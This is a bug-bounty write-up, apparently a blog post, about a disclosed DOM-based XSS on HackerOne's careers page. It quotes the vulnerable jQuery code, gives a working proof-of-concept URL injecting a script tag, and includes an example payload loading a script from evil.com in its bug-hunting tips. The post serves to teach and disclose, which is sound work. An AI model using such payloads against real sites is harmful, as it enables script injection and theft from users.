$500 Bounty: DOM-Based XSS in HackerOne's Careers Page

How a Simple URL Parameter and a JS Library Opened a Door to XSS in IE/Edge

Monika sharma

OSINT Team

· ~3 min read · May 21, 2025 (Updated: May 21, 2025) · Free: No

Overview

Security researcher Nguyenlv7 discovered a DOM-based XSS vulnerability on HackerOne's careers page, leading to a $500 bounty reward. The issue resided in the way the page handled ? lever- parameters in the URL and dynamically appended them into the DOM without proper sanitization

While this attack couldn't bypass the Content Security Policy (CSP) on modern browsers like Chrome and Firefox it still executed successfully on Internet Explorer and Microsoft Edge where URL parsing behaved differently.

Vulnerability Breakdown

Vulnerable Endpoint:

https://www.hackerone.com/careers?lever-<payload>

Vulnerable Code (Masonry JS file):

var pageUrl = window.location.href;
var leverParameter = '';
var trackingPrefix = '?lever-';

if( pageUrl.indexOf(trackingPrefix) >= 0){
  var pageUrlSplit = pageUrl.split(trackingPrefix);
  leverParameter = '?lever-' + pageUrlSplit[1];
}

var link = posting.hostedUrl + leverParameter;

jQuery('#jobs-container .jobs-list').append(
  '<div class="job ' + teamCleanString + ' ' + locationCleanString.replace(',', '') + ' ' + commitmentCleanString + '">' +
    '<a class="job-title" href="' + link + '">' + title + '</a>' +
    '<p class="tags"><span>' + team + '</span><span>' + location + '</span><span>' + commitment + '</span></p>' +
    '<p class="description">' + shortDescription + '</p>' +
    '<a class="btn" href="' + link + '">Learn more</a>' +
  '</div>'
);

Here the link variable containing unvalidated user input from the URL is directly embedded into the DOM. This creates an opportunity for a DOM-based XSS attack when a malicious script is injected via the ?lever parameter.

Proof of Concept (PoC)

https://www.hackerone.com/careers?lever-#aaa"><script src="https://app-sj17.marketo.com/index.php/form/getForm?callback=alert"></script>

On IE/Edge this payload caused the injected script to execute leading to a reflected XSS.

Impact

JavaScript code execution in the context of the careers page domain
While CSP blocked the attack in modern browsers, older or weaker environments (like IE/Edge) were still vulnerable
A malicious attacker could potentially use this vector for phishing or defacement

How You Can Find This Vulnerability

If you're hunting for similar bugs follow these steps:

Look for Dynamic URL Parsing

Search JavaScript files for window.location.href, window.location.search, or custom parsing of query strings.

2. Spot Untrusted Input Used in DOM Sinks

Check if variables derived from the URL are inserted into HTML with .innerHTML, jQuery().append(), or similar methods.

3. Inspect CSP

Try payloads on various browsers. If CSP blocks the attack, test on browsers like IE or test environments without strict CSP headers.

4. Create XSS Payloads with External Scripts

Example

<script src="https://evil.com/evil.js"></script>

5. Always Test Edge Case Browsers

Modern CSP might save you but legacy browsers or embedded contexts may still allow the payload to run.

Bounty Info

Hunter: nguyenlv7
Bounty Awarded: $500
Report ID: #474656

Final Thoughts

This report is a perfect example of why legacy browser testing and DOM input validation are still relevant in 2025. Even if modern defenses catch it attackers often target outdated environments where those protections don't exist.

Bug bounty programs like HackerOne continue to reward impactful findings even when exploitation is limited proving that good analysis and responsible reporting go a long way.

Thanks for reading! ✨🤑

Happy hunting, and remember: always check the DOM.

#bug-bounty #penetration-testing #technology #cybersecurity #hacking